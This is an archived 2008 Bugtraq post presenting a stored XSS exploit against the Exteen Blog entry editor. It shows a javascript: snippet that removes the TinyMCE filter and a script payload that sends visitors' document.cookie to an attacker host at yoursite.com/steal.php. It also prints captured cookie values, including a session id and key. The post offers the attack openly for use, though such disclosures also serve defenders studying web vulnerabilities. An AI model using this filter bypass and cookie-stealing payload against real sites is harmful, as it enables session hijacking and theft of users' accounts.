lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20080522125003.861.qmail@securityfocus.com>
Date: 22 May 2008 12:50:03 -0000
From: tan_prathan@...mail.com
To: bugtraq@...urityfocus.com
Subject: Exteen Blog XSS Remote Cookie Disclosure Exploit

==========================================================
     Exteen Blog XSS Remote Cookie Disclosure Exploit             
==========================================================


AUTHOR : CWH Underground
DATE   : 22 May 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : Exteen Blog
 VENDOR      : www.exteen.com
#####################################################

--- Vulnerable page ---
[-] http://www.exteen.com/manage/entryeditor.php (Create New Entry Page)

--- Description ---
There are 2 ways to exploit this page

1. Type "javascript:(function(){var x = document.getElementById('mce_editor_0_parent'); x.previousSibling.style.display = 'block';x.parentNode.removeChild (x);})()" on address bar and press Enter
2. Disable javascript on your Browser and visit vulnerable page
																	.
Two methods above will remove tinymce filter after that you can insert any script or HTML tag in your entry :D


--- Exploit (Grabbing Cookies)---

Simple Attack: <script>document.location = 'http://yoursite.com/steal.php?cookie=' + document.cookie;</script>


--- Note ---

This website implement httpOnly that prevent from stealing cookies on ie (>= 6) and firefox (>= 2.0.0.5)

=Result=
IE & Gecko: 	_uid57334=D8428C8A.2; _cbclose57334=1; _ctout57334=1; VisitOn=54016; VisitorTRUE=11
OPERA & Safari: _cbclose57334=1; _uid57334=16944A6F.1; sid=gdcvv9mab89uf9cmg3hqmhq570; keyx=NjgdHFErNXpCD1wpVTsYCF0dfx8KBTIDEFM; _ctout57334=1

##################################################################
# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C   #
##################################################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ